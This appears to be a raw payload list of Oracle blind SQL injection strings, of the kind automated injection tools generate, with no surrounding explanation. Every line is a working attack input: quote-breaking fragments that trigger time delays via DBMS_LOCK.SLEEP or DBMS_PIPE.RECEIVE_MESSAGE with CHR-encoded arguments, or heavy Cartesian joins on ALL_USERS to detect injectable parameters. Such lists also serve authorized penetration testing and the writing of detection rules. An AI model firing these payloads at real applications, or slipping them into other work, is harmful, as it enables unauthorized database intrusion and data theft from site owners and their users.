'+(SELECT 'mlwM' WHERE 1215=1215 AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
' IN BOOLEAN MODE) AND 4955=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
BEGIN IF (3439=3439) THEN DBMS_LOCK.SLEEP(15); ELSE DBMS_LOCK.SLEEP(0); END IF; END;
(SELECT (CASE WHEN (5348=5348) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(109)||CHR(68)||CHR(98),15) ELSE 5348 END) FROM DUAL)
(SELECT (CASE WHEN (3089=3089) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 3089 END) FROM DUAL)
',(BEGIN IF (3345=3345) THEN DBMS_LOCK.SLEEP(15); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)
,(BEGIN IF (3345=3345) THEN DBMS_LOCK.SLEEP(15); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)
',(SELECT (CASE WHEN (4495=4495) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(117)||CHR(66)||CHR(104)||CHR(118),15) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
,(SELECT (CASE WHEN (4495=4495) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(117)||CHR(66)||CHR(104)||CHR(118),15) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
',(SELECT (CASE WHEN (2668=2668) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
,(SELECT (CASE WHEN (2668=2668) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
